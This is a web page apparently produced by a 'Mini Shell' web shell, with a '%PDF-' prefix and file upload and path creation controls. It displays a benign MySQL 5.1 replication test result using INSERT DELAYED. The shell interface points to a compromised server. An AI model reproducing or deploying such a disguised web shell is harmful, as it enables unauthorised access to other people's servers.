%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/mysql/5.1/mysql-test/suite/rpl/r/
Upload File :
Create Path :
Current File : //home/rs/mysql/5.1/mysql-test/suite/rpl/r/rpl_row_delayed_ins.result

include/master-slave.inc
[connection master]
create table t1(a int not null primary key) engine=myisam;
insert delayed into t1 values (1);
insert delayed into t1 values (2);
insert delayed into t1 values (3);
flush tables;
SELECT * FROM t1 ORDER BY a;
a
1
2
3
SELECT * FROM t1 ORDER BY a;
a
1
2
3
drop table t1;
include/rpl_end.inc

Zerion Mini Shell 1.0